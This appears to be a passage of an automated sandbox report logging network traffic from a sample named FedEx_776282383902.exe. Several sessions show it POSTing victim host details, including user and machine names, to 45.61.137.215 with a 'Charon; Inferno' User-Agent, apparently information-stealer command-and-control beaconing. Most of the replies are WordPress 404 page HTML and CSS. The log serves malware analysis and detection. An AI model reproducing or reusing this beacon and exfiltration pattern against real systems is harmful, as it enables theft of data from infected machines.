May 22, 2024 22:02:17.061578035 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:17.071180105 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:17.071217060 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:17.075782061 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:17.077606916 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:02:17.077645063 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:02:17.077675104 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 22, 2024 22:02:17.086023092 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:02:17.089601994 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49722	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:17.236236095 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:17.288542986 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:20.032953024 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:17 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:20.035662889 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:20.042170048 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:20.042187929 CEST	672	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:20.054045916 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 22, 2024 22:02:20.054059982 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 22, 2024 22:02:20.054068089 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:20.066384077 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:02:20.066418886 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:02:20.069421053 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49723	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:20.207962036 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:20.258714914 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:23.692096949 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:20 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:23.693568945 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:23.697174072 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:23.697218895 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:23.704281092 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:23.704338074 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:23.711333036 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:02:23.711357117 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:02:23.711370945 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:02:23.717001915 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49724	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:24.001326084 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:24.009115934 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:27.000785112 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:24 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper 